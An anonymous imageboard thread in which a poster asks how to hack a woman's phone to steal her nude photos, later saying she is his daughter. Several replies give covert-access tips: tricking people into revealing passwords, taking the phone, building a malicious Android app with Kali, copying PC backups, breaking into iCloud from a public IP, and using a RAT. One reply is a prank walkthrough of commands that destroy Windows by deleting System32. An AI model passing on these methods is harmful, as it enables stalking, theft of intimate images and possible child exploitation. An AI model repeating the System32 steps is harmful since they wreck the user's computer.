Is there a way to hack someone's phone to steal pictures?

Is there a way to hack someone's phone to steal pictures?

Sure.
With physical access.

No other way?

When she's at work and i cant reach her phone?

wait until they're really distracted with something and then casually ask them what their password is just you were asking them the time. It rarely works but I've gotten at least 2 passwords that way. (I've probably asked about 150 times that way. It's low chance of success but if you fail no one will care because you're joking, right?)

Yeah sounds good.

What about taking the phone. Make shure that she thinks she lost it. Gave it back later.

If its android phone you can use Kali to creat virus in .apk file then instal it on phone and you can do whatever you want through your pc.

Nice!

If you can access her PC, make a copy the backup file.
>Win

Its all secured with a password.

But i know she has a couple of nudes on her phone.

No.

Literally just no.

Her phone would need to be rooted and you would need physical access to do anything. But then, if you had physical access, you could just steal the pictures anyway.

Android is pretty secure if the phone is not rooted.

Also, you need to get a fucking life. Jesus Christ on a pogo stick, kid, who the fuck tries to hack a phone for nudes. Goddamn internet is full of nudes. The fuck is wrong with you. Someone needs to slap your goddamn face and tell you to pull it together.

If you have to ask, you are a loser.

That's so not true

OP do you have her number?

You're a fucking idiot

If she has an iphone, hacking into an icloud account is surprisingly easy.

Life is over rated

Either way, she's gross and has tattoos

I can see nobody is in the mood to help so I will. Are you on mobile or on your PC right now, OP?

I've had someone see me through a phone I was using, Where they skilled at hacking the camera on phone.. How do you do that

Bit of an expert here.
Iphone? Physical access only, no exceptions. icloud if they use it, and even then Apple has really tightened icloud, so chances are if you got into it, you'd be cut off, tracked, or at least theyd be alerted rather quickly. So in a prefect situation, you could access their icloud from a public use IP on a throwaway or veiled laptop and get away scott free, but is it really worth it?

The phone itself, the only other way around is maybe get access to their PC they sync with and grab a copy of their backups from the roaming folder, and hope they aren't encrypted.

Android? its alopt easier, but the last android I got into was a couple years ago, so I'm not sure how that's advanced since.

Ofcourse

Both

>lso, you need to get a fucking life. Jesus Christ on a pogo stick, kid, who the fuck tries to hack a phone for nudes. Goddamn internet is full of nudes. The fuck is wrong with you. Someone needs to slap your goddamn face and tell you to pull it together.

While in general, I do agree with you, there are exceptions. There is ONE woman I know, that I would do almost anything to get nudes of. Every once ina while, you meet a broad who is just so god damned attractive, a true 10, that you just NEEEEEED to see naked.
I'm a grown ass man, dated 100+ women, and in all my year, I've only met one, ONE that I went to extreme lengths to see nude.

Pretty much a shit post, just saying you;re right, with 1 exception.

Its an android

Computer is preferred. You have PC or Mac? Have you ever hacked anything before?

Pc

No im the older Generation.

Backups on pc maybe.
"hacking" is a lie really.
There is no, sitting at your pc tapping keys and just seeing into their phone. You get the phone, or you get a backup, or you get the password for a cloud service. Those are the only options, and physically accessing the phone is tightened up, get the passcode or don;t waste your time.

So for a nub, really, just maybe jacking a a backing and praying it isn;t encrypted.

Also note, you could go to jail. Women are a protected class. Looking at a woman in a way that makes her mildly uncomfortable is akin to killing a dozen men in cold blood in the eyes of the law.

Weigh the risk vs reward kid.

Delete system 32

Since you have never obtained bypass permissions before you will need to do this before mirroring and emulating this qt's phone to your PC. FOLLOW THESE INSTRUCTIONS EXACTLY.

STEP 1

Click “Start,” type “cmd” and press the “Ctrl,” “Shift” and “Enter” keys together to load the Command Prompt console with administrative privileges.

STEP 2

Type “takeown /f C:\Windows\System32” and press “Enter” to take ownership of the System32 folder.

STEP 3

Type “Icacls C:\Windows\System32 ” and press “Enter” to give yourself rights to delete the "System32" folder.

STEP 4

Close the Command Prompt console by typing “Exit” and then pressing “Enter.”

DELETE FOLDER
STEP 1

Close all applications that are running on your computer.

STEP 2

Double-click the “Computer” icon on the Windows desktop to open “Windows Explorer.”

STEP 3

Double-click the icon labeled “Local Disk C:” and then enter the folder labeled “Windows.”

STEP 4

Select the folder labeled “System32” by clicking on it.

STEP 5

Press the “Shift” and “Del” keys together and click “Yes” on the “Delete Folder” confirmation dialog box to delete the "System32" folder. Click “Yes to All” on any “File Delete” dialog boxes that you encounter during the file deletion process.

Once your system is primed, report back to me.

Ok its my daughter. Someone told me she send around nudes. But i dont have a proof.

She always keep that shitty phone thight

Yeah that's all true if you're a noob, but not for is real hackers. I have over 300 confirmed hacks... something something you're dead, kiddo.

Im old but not an idiot boy

Clearly you are an idiot. You're on Cred Forums asking how to hack someone's phone. And if this is you then you are a fucking cucked faggot. If you bought and pay for this phone, it's your property and you fucking tell her to unlock it and give it to you. If you don't pay for it, then you have no rights to it. And if she's under 18, have fun explaining to your wife and the cops why your were trying to hack into a phone to obtain cp. Christ you're retarded.

You made me laugh.
Thank you.

RAT remote access trojan